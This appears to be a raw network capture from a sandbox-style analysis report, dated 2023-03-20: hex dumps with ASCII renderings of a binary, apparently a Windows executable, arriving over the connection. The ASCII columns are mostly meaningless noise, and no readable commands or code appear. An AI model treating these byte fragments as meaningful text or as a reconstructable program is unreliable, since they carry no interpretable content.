                                                                                          2023-03-20 08:06:41 UTC111INData Raw: 00 00 00 30 97 af c7 3f 00 00 00 10 d9 d3 c7 3f 00 00 00 50 03 f8 c7 3f 00 00 00 20 16 1c c8 3f 00 00 00 90 11 40 c8 3f 00 00 00 c0 f5 63 c8 3f 00 00 00 e0 c2 87 c8 3f 00 00 00 00 79 ab c8 3f 00 00 00 30 18 cf c8 3f 00 00 00 a0 a0 f2 c8 3f 00 00 00 70 12 16 c9 3f 00 00 00 b0 6d 39 c9 3f 00 00 00 80 b2 5c c9 3f 00 00 00 00 e1 7f c9 3f 00 00 00 50 f9 a2 c9 3f 00 00 00 70 fb c5 c9 3f 00 00 00 b0 e7 e8 c9 3f 00 00 00 f0 bd 0b ca 3f 00 00 00 80 7e 2e ca 3f 00 00 00 60 29 51 ca 3f 00 00 00 a0 be 73 ca 3f 00 00 00 70 3e 96 ca 3f 00 00 00 f0 a8 b8 ca 3f 00 00 00 20 fe da ca 3f 00 00 00 30 3e fd ca 3f 00 00 00 30 69 1f cb 3f 00 00 00 40 7f 41 cb 3f 00 00 00 70 80 63 cb 3f 00 00 00 f0 6c 85 cb 3f 00 00 00 b0 44 a7 cb 3f 00 00 00 f0 07 c9 cb 3f 00 00 00 c0 b6 ea cb
                                                                                          Data Ascii: 0??P? ?@?c??y?0??p?m9?\??P?p???~.?`)Q?s?p>?? ?0>?0i?@A?pc?l?D??
                                                                                          2023-03-20 08:06:41 UTC119INData Raw: 09 1a 06 00 1a 34 0f 00 1a 72 16 e0 14 70 13 60 84 2a 00 00 01 00 00 00 9d 16 00 00 83 17 00 00 9c 4f 01 00 83 17 00 00 01 06 02 00 06 52 02 50 01 0f 06 00 0f 64 07 00 0f 34 06 00 0f 32 0b 70 01 08 01 00 08 42 00 00 01 09 01 00 09 62 00 00 01 0a 04 00 0a 34 0d 00 0a 72 06 70 01 08 04 00 08 72 04 70 03 60 02 30 01 0f 06 00 0f 64 06 00 0f 34 05 00 0f 12 0b 70 01 15 05 00 15 34 ba 00 15 01 b8 00 06 50 00 00 01 0d 04 00 0d 34 09 00 0d 32 06 50 01 0a 04 00 0a 34 06 00 0a 32 06 70 01 00 00 00 00 00 00 00 01 00 00 00 01 16 0a 00 16 54 0c 00 16 34 0b 00 16 32 12 f0 10 e0 0e c0 0c 70 0b 60 19 1c 03 00 0e 01 1c 00 02 50 00 00 18 f7 00 00 d0 00 00 00 01 1c 0c 00 1c 64 10 00 1c 54 0f 00 1c 34 0e 00 1c 72 18 f0 16 e0 14 d0 12 c0 10 70 01 14 08 00 14 64 0d 00 14 54 0c
                                                                                          Data Ascii: 4rp`*ORPd42pBb4rprp`0d4p4P42P42pT42p`PdT4rpdT
                                                                                          2023-03-20 08:06:41 UTC126INData Raw: 00 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 04 08 00 00 00 00 00 00 00 00 00 00 00 00 a4 03 00 00 60 82 79 82 21 00 00 00 00 00 00 00 a6 df 00 00 00 00 00 00 a1 a5 00 00 00 00 00 00 81 9f e0 fc 00 00 00 00 40 7e 80 fc 00 00 00 00 a8 03 00 00 c1 a3 da a3 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: ABCDEFGHIJKLMNOPQRSTUVWXYZ`y!@~
                                                                                          2023-03-20 08:06:41 UTC134INData Raw: be 2f 93 c7 25 40 15 69 53 35 45 7f c9 07 0c 4b 24 c6 ea 63 fa 2e 65 73 7d f9 f4 c0 3c 59 3c 2d 03 e1 19 cb 70 6c 1b 2e e6 4d b1 a3 71 5e 73 23 45 32 44 1b a5 3f 41 19 7e d4 a4 2a ca 0f 11 44 39 f5 79 d9 79 5b f0 69 d8 06 10 60 7f ef 26 08 a6 20 11 5a 40 26 56 37 0c de 7c 4f 45 78 c0 fe 39 e9 0d 67 05 3c fc 3c 18 11 79 5b f0 69 d8 06 10 60 7f ef 26 e0 a6 20 11 5a 5f 26 49 37 0c de 7c 4f 45 78 c0 fe 3d 5b 24 f3 3a f0 14 7e 3c 59 70 51 55 c9 5e c6 6f 4e 33 62 27 39 04 b4 3a fe 02 20 45 37 08 6a 4d 9b 6a bd 78 2d 71 62 0d c8 78 8c 3c fd f5 56 b8 52 36 21 51 0a bf 0e 23 2a 08 78 5d 2c 36 82 d2 19 15 72 44 53 27 ee 46 3f 3f 2b c9 06 c7 43 35 12 48 3f 38 56 b9 7c 36 21 51 c9 63 70 76 ef 17 24 60 25 b1 ad 5c a3 46 31 44 53 27 dc 2a 2d 7e a0 ad 2a c2 82 11 12 35
                                                                                          Data Ascii: /%@iS5EK$c.es}<Y<-pl.Mq^s#E2D?A~*D9yy[i`& Z@&V7|OEx9g<<y[i`& Z_&I7|OEx=[$:~<YpQU^oN3b'9: E7jMjx-qbx<VR6!Q#*x],6rDS'F??+C5H?8V|6!Qcpv$`%\F1DS'*-~*5
                                                                                          2023-03-20 08:06:41 UTC142INData Raw: ae 85 71 f4 46 7a 6b 00 e0 11 89 62 c5 23 8f b6 31 ef e4 d9 65 f3 f8 6e c5 d4 b2 43 35 1f 34 cc 64 d0 79 dc b1 64 e5 e4 eb b7 cc e3 2e b4 da 77 ca 85 38 63 f1 68 cd 16 9c d3 be 72 57 04 f0 17 f5 d7 cc c6 6f bf 79 e1 bc 54 30 21 da 0f 8c bf d2 49 a1 d1 88 67 ff bb ba 22 cc 7a fc 1a a5 20 75 b8 72 93 fc f3 b7 e6 f4 19 c9 70 bd 2c 84 0e 25 8a 51 85 71 f8 62 00 6b 00 a0 09 85 7e d2 63 f5 e7 0a ac d7 aa 08 89 33 aa 04 d2 18 53 36 74 fa 3d 8c 1d b7 25 88 65 da 07 80 c3 66 de e2 44 45 4c 7d f7 16 f6 0d be 00 77 08 83 f9 b6 3e 2b f4 a2 4e c7 7e 76 71 78 84 7e 3d 68 30 c8 37 bf cb b7 f4 27 db 74 f0 64 35 33 de 6d 49 f6 29 e3 20 ea 28 89 a7 27 ff 16 80 2e 85 78 b0 15 8c 54 bd 1d 80 7f 83 47 34 8f 76 d6 9d 21 61 64 b4 3f e7 81 96 c8 bb d2 6d df 40 8d c0 d4 f0 27 f5
                                                                                          Data Ascii: qFzkb#1enC54dyd.w8chrWoyT0!Ig"z urp,%Qqbk~c3S6t=%efDEL}w>+N~vqx~=h07'td53mI) ('.xTG4v!ad?m@'
                                                                                          2023-03-20 08:06:41 UTC150INData Raw: 2f 10 3f 2b fa 2f c1 fb 9e de db d2 70 d4 71 a8 c7 c0 90 a8 31 f0 0a e3 78 38 e8 31 b5 fb 1e a6 35 06 f1 1e a9 1e e5 53 f8 98 3c a5 04 cb 41 2c 71 78 fd 3c b4 64 b1 64 d9 13 1f 48 33 e9 26 88 96 85 1e b0 82 cf 46 fd 85 ba 2e e2 28 b1 be 5e f9 5c d3 49 35 b3 34 38 c0 2b 3c 68 5b 64 11 3d bd 0d 73 e3 26 40 b0 43 ed d5 d2 63 05 64 26 ac d7 ea 20 79 df 0c 71 62 c0 36 75 f7 e7 86 93 9e 79 38 1a 54 51 42 5f 0d 63 20 e2 45 31 ef 78 2a eb fd 0e 5f 6b a4 c9 40 af 81 36 e0 4c ef 90 aa 36 be b0 91 39 d0 71 38 bb 6c 01 b5 d5 89 d9 67 e2 55 31 e5 40 2a c1 4e 4f 37 cf 16 78 2f ee 7c 7f a0 24 ea ca 0e b5 fd 35 5c 14 9e 78 4c 10 49 51 42 34 a0 4b 06 6a 00 a6 21 f5 12 53 26 45 f0 01 d7 f7 ea 65 39 54 6e f5 11 c8 06 b1 cc f2 c6 9c 76 b7 25 b4 d6 b0 fa 49 44 fd a5 aa ea 62
                                                                                          Data Ascii: /?+/pq1x815S<A,qx<ddH3&F.(^\I548+<h[d=s&@Ccd& yqb6uy8TQB_c E1x*_k@6L69q8lgU1@*NO7x/|$5\xLIQB4Kj!S&Ee9Tnv%IDb
                                                                                          2023-03-20 08:06:41 UTC158INData Raw: 59 50 3a e9 26 18 d9 39 74 36 fd d1 a4 f6 ae 55 a1 3e 7d b8 4a 33 7b 09 1e bb be 31 69 f1 79 81 fb 2d 28 d2 92 42 34 99 56 7a ea 75 79 c7 d9 3e a6 ad 00 2f cd 16 c8 ac 20 21 f2 21 71 62 c0 0e 2d 5e 75 43 c6 d8 79 70 b1 d5 51 42 b5 3d 2b 09 0e 26 30 ef 70 62 da 63 99 f0 01 83 96 eb 65 39 fe 46 a1 65 c0 06 e5 4f b1 87 c3 d8 49 b8 00 e0 ae bd f3 0d 23 3b b7 00 61 0f 70 6a 71 af 00 27 85 3e 38 6f e4 7c 2f 76 a3 9d be c2 40 64 80 d1 14 c0 fb 2d 10 18 e5 42 34 c9 76 42 64 dc 61 64 8d cf d2 68 5e bc 09 73 df 8a a4 d3 3c a2 24 42 c0 06 15 1a 17 87 c3 d8 49 48 a9 40 ad bd f3 0d 2b c3 14 00 61 e5 70 62 04 fb 45 37 c5 16 30 ec 22 39 3f 40 34 7a 20 ca 70 6c f0 3d 24 15 e1 97 cf a0 24 5a 34 58 a2 62 ac 45 b5 b9 5a 7a 53 9e c0 27 06 5b a9 1e b1 a5 a2 45 42 e3 34 97 75
                                                                                          Data Ascii: YP:&9t6U>}J3{1iy-(B4Vzuy>/ !!qb-^uCypQB=+&0pbce9FeOI#;apjq'>8o|/v@d-B4vBdadh^s<$BIH@+apbE70"9?@4z pl=$$Z4XbEZzS'[EB4u
                                                                                          2023-03-20 08:06:41 UTC165INData Raw: 17 18 b1 2a c8 06 d9 b3 34 90 16 30 3c 68 88 78 49 42 34 75 6a 7a 6b 00 6e e0 92 7b 53 26 78 e6 00 53 28 64 e1 e4 3f 2b 71 5f 6b 2d 35 74 7e fc 9a 58 3c 68 0d fd e9 42 34 47 b7 e3 6b 00 61 59 7e 9e 53 26 4a b2 c4 52 28 6b a2 7c 0f 5b 5c 62 41 fb e6 39 13 68 78 d2 ff e9 7d 11 b0 5a 64 ef b2 17 5b f1 5c 24 92 bd 16 06 2e 84 44 53 a9 2e 45 51 5a 2b 71 e3 04 63 9a 34 71 78 bd 2c 1c 14 3e 2b 51 85 71 60 ba e0 6b 00 ea 29 1d 8d b2 e7 af 34 cd 06 00 ea 10 11 d9 a2 7b 62 ca 06 1d ff 34 58 b7 14 0c 80 4a 83 51 42 7c c3 cb 2a ee c0 6e e0 ed 7b 53 26 fd e6 00 53 28 82 36 c6 c0 d4 b6 27 69 66 71 74 71 b9 51 71 38 e9 45 09 81 b8 34 48 f4 27 4b 2f db 64 35 fb 16 06 91 fc bb ac a9 1e 45 39 7c 2d 71 e9 04 63 be 31 59 90 2a 31 3d 68 bb f9 d4 82 3b cc a1 63 6b 00 d9 2f d1
                                                                                          Data Ascii: *40<hxIB4ujzkn{S&xS(d?+q_k-5t~X<hB4GkaY~S&JR(k|[\bA9hx}Zd[\$.DS.EQZ+qc4qx,>+Qq`k)4{b4XJQB|*n{S&S(6'ifqtqQq8E4H'K/d5E9|-qc1Y*1=h;ck/
                                                                                          2023-03-20 08:06:41 UTC173INData Raw: d2 da f6 82 f6 37 f4 90 56 af 10 68 c5 26 77 a9 91 73 09 ea 1c 3d 4f c2 78 2b 20 09 97 b1 bd 1d 6f 5a a8 e9 dc 8f 76 a1 d5 e3 61 64 f4 1f 90 36 ce 7a 87 a4 c9 aa 8f 3d b6 7e b2 e3 34 80 7e b4 d9 7c fb 1c f3 91 51 21 51 29 71 87 45 eb 2e cf d9 d7 fa 5b 66 a7 30 f8 af f0 0b 6b a2 7c f4 33 5d 62 41 c8 78 bf 86 99 84 da 82 c8 1f 0a 9b 93 dd 4b f9 a3 82 05 e8 29 fe fb 26 ed fe d7 17 ec a9 26 ae ba 84 0e ea e3 34 88 21 06 0f c7 fb 1c 83 5b 7c 21 51 c9 79 f7 c4 83 aa ea 65 ed 60 c5 d2 63 fa 40 5c 53 28 ea 20 86 29 4d 8e 9d c0 0e 8a bf 68 e3 3c 11 b1 2d d7 6d da 85 b5 3d 8c 77 d4 ff 9e 2c bc 3e 77 1e ce 72 1b 1b a1 37 41 09 b6 6f 55 4a ca 06 8a 30 fa 35 f7 d2 69 a7 bb 6c 92 cb 70 6c 13 8a 11 75 60 64 f2 3f 0c 50 e9 37 44 d2 6d 34 64 84 c0 d4 fa aa ff 79 df 74 71
                                                                                          Data Ascii: 7Vh&ws=Ox+ oZvad6z=~4~|Q!Q)qE.[f0k|3]bAxK)&&4![|!Qye`c@\S( )Mh<-m=w,>wr7AoUJ05ilplu`d?P7Dm4dytq
                                                                                          2023-03-20 08:06:41 UTC181INData Raw: 71 62 00 ca 36 3d f2 bb 38 10 c3 a1 45 8b 96 07 14 95 84 62 6b 81 2c 44 f4 24 f3 02 84 5a 64 55 a9 2e 45 42 06 d4 8e e3 04 63 34 42 8e 87 bd 2c 1c 17 c3 b1 51 c9 71 68 f4 27 4b 55 d3 64 35 bb 36 06 40 38 eb 90 6c 40 b5 52 7a 0b 23 eb 04 63 b4 39 51 f1 f1 67 64 e9 45 01 00 b7 11 91 b2 17 4b 98 7b 7e b3 f1 16 06 01 0c 94 5c ae f7 65 39 3f ec 34 4a 0d e7 35 74 b0 1d 14 57 bd 1d 18 ac 81 58 1d 8f 76 42 fd 52 61 64 b4 0f 73 7f fd 38 4b d2 6d 4b 14 1d c0 d4 f0 17 61 85 d4 75 7e f3 79 79 b7 2d 18 c9 0b 71 34 48 77 e9 a3 c1 89 74 7c f7 00 27 4a 80 8c 35 e9 82 6d 78 b7 20 b6 27 61 fd a8 74 71 f9 71 79 2a d3 f6 b6 d0 07 14 10 9c 9d 94 81 14 44 22 15 95 b1 ce 7a 64 17 13 ba 13 3c b7 29 39 9d 83 84 70 54 25 67 3c 59 fd 0d 10 2b 90 2f 14 4c b2 17 4b 02 b4 63 35 f1 16
                                                                                          Data Ascii: qb6=8Ebk,D$ZdU.EBc4B,Qqh'KUd56@8l@Rz#c9QgdEK{~\e9?4J5tWXvBRads8KmKau~yy-q4Hwt|'J5mx 'atqqy*D"zd<)9pT%g<Y+/LKc5
                                                                                          2023-03-20 08:06:41 UTC189INData Raw: de 5f 61 64 3a fe 89 2b 45 37 79 fb 5b 6b 65 36 ba 94 7c 62 41 84 b0 74 70 78 3c f9 04 68 30 99 ee 7e 82 6a b2 d7 6b 01 61 64 bf 76 1d 59 c4 b2 44 52 28 6b 50 b9 3f 2b f0 d7 41 42 35 74 2e 8c 72 26 b7 dd 30 20 51 42 f3 cd 3b 63 6b 00 8f 9d 35 7a d2 93 4d 36 44 53 05 ab 55 a6 be 9e 79 63 41 43 ba fa 44 e7 fb dc 3c 69 30 21 e4 c5 34 48 b2 e7 6b 01 61 64 08 57 ac d9 ce ba 44 52 28 6b 92 d8 fe c1 72 eb d4 43 34 74 71 f3 ea 32 b9 68 31 21 51 16 bd cd 33 63 6b 00 e0 d1 35 7b 53 26 8d 5f 3d 3f a3 ee 65 38 3f 2b fa e7 49 42 35 74 99 67 f9 59 3c 24 bb d1 19 c7 f4 47 b7 fe 64 00 61 dc 92 a7 53 26 ac 35 bb ac d7 68 12 31 f8 ae 71 63 41 43 e4 2e 71 78 84 c6 2e 8c 19 a0 d4 42 35 48 33 a5 12 ff 9e e5 b0 7a 52 26 45 56 9a ac d7 ea e0 39 3e 2b 71 b8 20 bc ca f5 fc 78 3d
                                                                                          Data Ascii: _ad:+E7y[ke6|bAtpx<h0~jkadvYDR(kP?+AB5t.r&0 QB;ck5zM6DSUycACD<i0!4HkadWDR(krC4tq2h1!Q3ck5{S&_=?e8?+IB5tgY<$GdaS&5h1qcAC.qx.B5H3zR&EV9>+q x=
                                                                                          2023-03-20 08:06:41 UTC197INData Raw: 9a 08 5d 5b f0 0d 3f 97 e4 53 1c e6 14 b5 08 fa 33 62 ea 4d 96 9b 60 d5 26 ad 08 c0 b3 b2 03 a1 b4 d0 3c e1 b0 8b 44 ca 78 83 f0 35 cb 1e 61 3f 02 a0 24 b5 0b 81 49 50 e0 45 96 ed b1 5e db 26 45 37 0c d8 6d 44 2d b0 bb 0f f1 62 41 43 be 31 72 f1 78 7d 44 21 bb 67 01 0a bd 0c 17 12 e0 45 42 ed 71 5e 3b 6e c8 72 73 1b a1 2f 41 59 b4 6e 76 eb 05 67 6d ff 34 83 b5 1d 18 38 bb 64 4e cb 70 6c 7b e9 2e 13 e8 20 11 3a d8 60 4d be 00 77 10 e0 20 22 b6 6f 55 52 ca 06 22 fd 35 5c 14 d2 79 97 74 aa 1c 4d bf 05 38 26 e0 45 56 2c be 6c da 62 61 17 ac ac 2a 6a 65 fe 7a d0 f5 65 41 43 be 39 8a 3c b7 99 84 e1 3b 14 76 b5 d5 63 f9 b3 82 03 ab a5 dc 7c da 6b be b4 31 a8 39 e0 20 c2 7b 10 b1 16 50 fb 7a 98 71 78 01 67 b7 68 30 55 46 ab 03 b2 cc 9d 23 8b 24 4b 8e 7b 53 26 45
                                                                                          Data Ascii: ][?S3bM`&<Dx5a?$IPE^&E7mD-bAC1rx}D!gEBq^;nrs/AYnvgm48dNpl{. :`Mw "oUR"5\ytM8&EV,lba*jezeAC9<;vc|k19 {Pzqxgh0UF#$K{S&E
                                                                                          2023-03-20 08:06:41 UTC204INData Raw: 61 ef 70 8d 17 ad 08 d8 cf 06 d3 e0 28 ca b6 6f 55 42 a9 d2 47 74 71 bf 79 a2 96 42 30 21 e9 8f f8 84 ff e9 26 fb 96 85 8d 3f 73 f1 01 f6 ae 56 a1 3e 9e b2 72 d0 86 83 80 a9 30 fd 24 83 57 1c c7 43 b9 64 aa fa fd 0a 25 d0 e0 4d 9a 93 d4 c2 f2 86 e5 97 85 b9 2e e2 30 c2 bc 5e 8a 50 86 06 c6 98 99 78 3c 98 59 9b 34 e0 34 b1 3e c9 76 91 45 0e 9e 9b be 37 a0 d1 a4 8f 9f 18 40 44 a4 d3 39 a2 24 91 c0 36 c6 6a 04 eb 3c 9e 79 6f 8a 75 51 42 bf 05 34 95 8a 2b ab b5 dc 79 99 e7 ac 31 cd 1e 2f ea 10 3e 64 57 72 62 86 06 ca 8f 43 78 3c 32 79 97 2c a8 14 bd 8c e3 99 c8 c1 8b 2c 9b c2 9b 92 cc 41 be 11 ac a9 1e 9a 31 23 23 71 e9 04 bc be 31 76 f3 79 aa b7 2d cb 98 6d 42 34 48 ba 26 4f 20 89 6f c3 84 ac e1 00 30 c9 37 28 6b e4 7c 38 a7 31 9d be c2 40 73 68 dd c3 a6 b7
                                                                                          Data Ascii: ap(oUBGtqyB0!&?sV>r0$WCd%M.0^Px<Y44>vE7@D9$6j<youQB4+y1/>dWrbCx<2y,,A1##q1vy-mB4H&O o07(k|81@sh
                                                                                          2023-03-20 08:06:41 UTC212INData Raw: f2 30 55 48 be a6 3c 68 7c aa 92 29 70 6c 03 45 e2 44 45 54 5e 3e 77 16 20 be 00 77 18 ea 21 1d 0f dc f4 62 41 82 59 50 41 77 bd 2d 18 58 5b 75 54 42 f3 0c 17 5a cc d3 61 64 f4 1e 77 1e 47 5c 00 77 10 00 ec 7d 1b 13 f0 16 65 7b 75 c4 15 79 b7 0d 18 50 bb 6d 75 72 dc 47 ff 9d 94 33 ba 2c be 0e 77 4e 0d bc 87 1b a3 37 41 59 77 a8 b5 32 1e 80 f9 b8 f8 34 18 51 69 20 bb cd 19 c1 d8 28 f4 27 7b 4e e9 64 35 bd 16 36 07 fc 44 53 a9 2e 75 5e 3e d4 8e e3 34 53 6f d8 ad 10 b7 1c 2c d1 33 21 51 42 bd 0d df a5 2e 10 e3 7c 35 7a 92 43 55 3d c5 26 38 b2 1c 60 ae a0 34 72 c8 06 dd b3 34 68 8b 47 3c 68 b1 64 41 c4 3c 48 33 a3 0e 10 6a a5 58 6a 5b a7 00 27 5d dd d7 94 e4 4c 2f d4 c2 42 b4 c8 70 64 f8 3d cc 9e 79 40 78 bd 51 42 f5 2d 1b 6f aa 65 49 6d b4 3f 7b ab 5e c8 bb
                                                                                          Data Ascii: 0UH<h|)plEDET^>w w!bAYPAw-X[uTBZadwG\w}e{uyPmurG3,wN7AYw24Qi ('{Nd56DS.u^>4So,3!QB.|5zCU=&8`4r4hG<hdA<H3jXj[']L/Bpd=y@xQB-oeIm?{^
                                                                                          2023-03-20 08:06:41 UTC220INData Raw: 15 db 37 28 45 f0 01 4b 76 a9 65 39 fe 4e 69 60 c0 36 2d 26 8d 74 3c d2 79 70 bb 64 71 0a bf 4d 47 36 6a 00 ea 34 3d 92 fb 6e 45 37 0c d8 3d 0e 31 38 3f a0 3b 6a 09 ca 37 3c f8 3a 0c 11 3f a0 78 a8 13 62 8c 6a fd 62 6b 48 e8 2e 1d 93 13 d8 ba c8 83 16 30 d0 27 39 3f ea 1c 7a 49 82 58 6c 79 f9 49 41 d0 ef 3c 21 96 07 14 19 f1 62 6b 81 24 44 88 86 ac d9 c4 7a 64 77 2c 4b 91 b8 4a 0b 88 65 63 b7 79 ff 74 75 68 58 3c e3 65 01 da 0f 2c 05 b8 62 83 93 cd 9b ca bd 16 3e 3f 02 44 53 a9 2e 7d 25 50 d4 8e e3 34 5b cb 91 fd 09 bd 1c 24 24 e5 21 51 c3 41 50 96 ad 16 8e a6 21 15 e3 67 26 45 5c 01 73 37 e2 20 19 b4 66 51 da 08 f7 f7 92 86 99 fd b3 3a d0 7f cd 95 0c bd 1d 13 e9 26 20 96 85 f4 90 50 af 10 17 c5 26 08 07 ff 17 44 aa 04 42 2a 64 15 0f fa 2d 1c 15 b7 6d a6
                                                                                          Data Ascii: 7(EKve9Ni`6-&t<ypdqMG6j4=nE7=18?;j7<:?xbjbkH.0'9?zIXlyIA<!bk$Dzdw,KJecytuhX<e,b>?DS.}%P4[$$!QAP!g&E\s7 fQ:& P&DB*d-m
                                                                                          2023-03-20 08:06:41 UTC228INData Raw: b0 78 3c d8 49 a3 bf 7f 6d 49 f3 0d e0 d2 cd 00 61 a5 58 a9 58 a7 08 e4 19 9f 06 82 a4 54 ec 28 f0 27 92 23 59 74 71 f9 49 8a 74 5e 1b 3c da 0d 3c 00 30 75 e0 45 b2 4f fb f3 17 02 75 bc 01 98 6c e0 28 ee b6 6f 55 4a c8 0f 11 54 39 f5 71 b2 d4 d3 0e 21 51 c7 f4 3c 3e 61 1e eb da 72 33 7a 53 cf 0d ca bb ac 93 56 3e 39 3f c2 4f 9f be bc f2 31 b6 ee c9 59 3c e9 7d e6 63 3b fe 03 58 27 ac 65 e8 21 f2 fb 16 e1 1c c9 bb ac 43 2e a2 57 b6 6e b6 da de 51 d1 5d f0 0d fb 06 f2 11 7b e6 14 9d 1d 92 33 62 aa 65 be 61 b4 37 8c 28 f1 c2 e8 92 45 b4 6c b8 7a f4 94 03 41 43 b4 01 ae 12 50 08 3c af 75 fa 4e 59 34 48 f2 07 b0 04 e0 21 ee 95 f9 d9 ba bc 09 88 df 8a dd e0 8b b4 5d 49 8b 92 dc 77 bb b9 d5 5c b5 25 eb e0 3c 99 36 c9 46 b9 b0 fb 6e 64 f2 3f 80 40 02 37 44 92 4d
                                                                                          Data Ascii: x<ImIaXXT('#YtqIt^<<0uEOul(oUJT9q!Q<>ar3zSV>9?O1Y<}c;X'e!C.WnQ]{3bea7(ElzACP<uNY4H!]Iw\%<6Fnd?@7DM
                                                                                          2023-03-20 08:06:41 UTC236INData Raw: 11 0e fd 0e 71 53 28 82 62 c6 c0 d4 f2 1f a6 47 41 7e c9 d7 0e 59 3c 81 c7 df ae bd 7c c5 7e 8d 83 73 d5 9a ca 3b d8 e0 ac d1 ba ac d7 e8 18 de 3d 5f 7b da e2 38 35 74 98 ae c2 a6 c3 20 bd 6c 86 aa 62 de cd 9d 23 89 22 7c 7d ff 93 52 93 7f c9 1e c7 23 ee ea d7 22 c8 9d be a8 fd f7 0c 9f 3f 2d 36 d0 4f a9 51 42 dd ee cd 9d 94 48 ec 29 da 92 6d bf bb c8 af fe ef 2e d2 04 c9 2b 71 2a cc 06 2a 38 fc 35 33 d8 79 df 07 41 ae bd 7c c1 77 46 43 c1 0c d3 38 fb 26 91 7f 44 08 35 a9 1e d2 44 70 6b 17 a5 04 fc 55 ec 71 78 fd 34 83 6a b1 54 ee 2a 38 46 33 a5 2e bb e8 3b 35 7a d2 53 fe ee 7b 64 35 ea 20 82 cf 75 8e 9d c0 36 8e 67 3f 4b 21 9e 79 17 73 6f 51 42 b5 3d 4c 35 12 08 ec e5 70 05 53 6a ba c8 85 3e 57 61 e4 4c 40 ac 71 4e 41 c8 70 0b 35 f3 79 e2 b7 3d 8f aa 1c
                                                                                          Data Ascii: qS(bGA~Y<|~s;=_{85t lb#"|}R#"?-6OQBH)m.+q**853yA|wFC8&D5DpkUqx4jT*8F3.;5zS{d5 u6g?K!ysoQB=L5pSj>WaL@qNAp5y=
                                                                                          2023-03-20 08:06:41 UTC244INData Raw: dc 9e 78 4c 00 c4 da 42 34 c9 77 46 5b c6 ae 64 35 11 17 02 75 72 cd 17 0c 5b dd 7c 1f fc 35 e3 35 67 05 2d 9f 2d 3c 9e 78 4c 04 c7 57 42 34 c3 7f 46 5f f7 80 a5 df 7f da 72 61 03 fe 7b 28 6b 65 b8 4b 0f 45 23 42 4d 35 ff 35 5c 08 d2 78 4c 00 c9 ef a8 cb b7 7b e9 a3 48 e4 a4 41 70 eb 08 c8 37 44 ba 51 94 9a c6 87 12 79 62 41 7e 0c 7c 71 78 48 54 d5 00 cf de ae 0a bd 31 13 2a e2 59 71 2c be bb 1b ad 19 13 24 1b ab af 35 66 fc e7 39 eb 1d 67 3d 3c f8 14 18 49 74 e1 44 05 49 15 7c cb df 32 e0 84 45 f4 35 7a 53 ad e9 13 c4 53 28 6b 2c b2 e7 a2 35 46 71 c8 b1 50 f9 78 3c 59 74 e3 ca a8 15 66 1c c1 5f 46 4b 48 ea 95 dd 7f b6 d9 ba 7f cf 56 56 91 65 39 f8 6f 55 2a bc 01 35 74 b6 3c 18 15 a1 f3 30 21 19 c7 f4 3d 5f a5 2f 24 21 b5 23 7a 53 9f 27 52 03 c8 69 d2 7c
                                                                                          Data Ascii: xLB4wF[d5ur[|55g--<xLWB4F_ra{(keKE#BM55\xL{HAp7DQybA~|qxHT1*Yq,$5f9g=<ItDI|2E5zSS(k,5FqPx<Ytf_FKHVVe9oU*5t<0!=_/$!#zS'Ri|
                                                                                          2023-03-20 08:06:41 UTC251INData Raw: fd 90 99 53 28 82 7e c6 c0 d4 b6 27 46 23 e5 74 71 f9 79 5e cb b4 30 21 d0 0f 33 03 ed 14 36 81 14 63 6a 85 24 7b 82 72 bf 58 f3 6b 65 e8 5a d0 f0 2f ba 20 a6 5a 46 f9 49 a2 13 c4 14 16 96 07 db a8 28 62 6b 6b 24 8b 20 f3 16 c9 c4 72 ab 32 0e 94 9a b8 7a c4 4a 12 41 43 b4 01 9e 0f 12 58 3c af 75 d2 58 00 34 48 b2 27 98 67 b4 64 35 11 16 d5 5a be 01 a0 a9 1e 96 fe 48 76 f5 e3 34 b0 98 fc 0b fc fb 1c c3 ef 57 21 51 83 51 b7 31 09 2e ff 4d ed 70 85 eb eb 89 fb 88 d2 5d 94 ae 36 76 2b b6 27 42 45 ac 74 71 f3 71 5a cb 89 f1 cb 57 cb 61 4b b2 27 68 d5 ff 9b ca fb 26 25 52 53 ba ac ef 2e 92 9a 9e 2b 71 e9 04 b4 b8 78 31 b9 dd 5c b5 25 c7 a0 24 b5 e2 9c c2 75 ea 75 96 51 26 b5 44 ad 00 c0 cd 17 0c 0b ee 7c 3c a2 35 46 19 c8 70 8b f8 3c 18 09 b7 2d 37 a8 15 66 7c
                                                                                          Data Ascii: S(~'F#tqy^0!36cj${rXkeZ/ ZFI(bkk$ r2zJACX<uX4H'gd5ZHv4W!QQ1.Mp]6v+'BEtqqZWaK'h&%RS.+qx1\%$uuQ&D|<5Fp<-7f|
                                                                                          2023-03-20 08:06:41 UTC259INData Raw: 3a 68 30 32 01 4a 34 8f b6 7a 6d 00 61 6f 8a 7a 53 a7 c0 2f 42 53 28 b7 51 c6 c0 aa c4 7a 47 43 35 ba d9 8f c3 d2 b9 70 36 21 51 06 bf cd 13 64 6b 00 ea f1 1d 7c 53 26 ce ba 54 55 28 6b ec 7d 1b 0b 99 d7 ce bd ca 9d 5f 7d 3c 59 fb ed 28 27 51 42 45 07 33 62 ea 85 79 62 35 7a 7f 07 45 37 85 fe 30 6d 65 39 30 aa c4 7a 47 43 35 49 f2 0d 2c d8 b9 70 36 21 51 5d 30 b7 cc e3 de 18 67 64 35 55 ea 54 55 f0 c1 73 2e 6b 65 33 ac 2b 71 e3 cc 63 33 74 71 be c7 26 af e9 b5 01 57 42 34 dc b7 62 6b 81 d4 44 33 7a 53 ee ff b5 d7 94 ad 7b 63 39 3f 99 28 62 41 82 90 64 77 78 3c 54 bd dd 20 27 51 42 52 21 3a b6 00 85 71 62 35 7a 62 af c0 27 42 53 28 00 e0 29 39 2b 71 7c c8 c6 25 72 71 78 bd ec 2c 6e 30 21 c0 7d 94 a4 f4 e7 43 06 61 64 f5 aa 53 26 2e b2 6c 55 28 6b 58 b0 ba
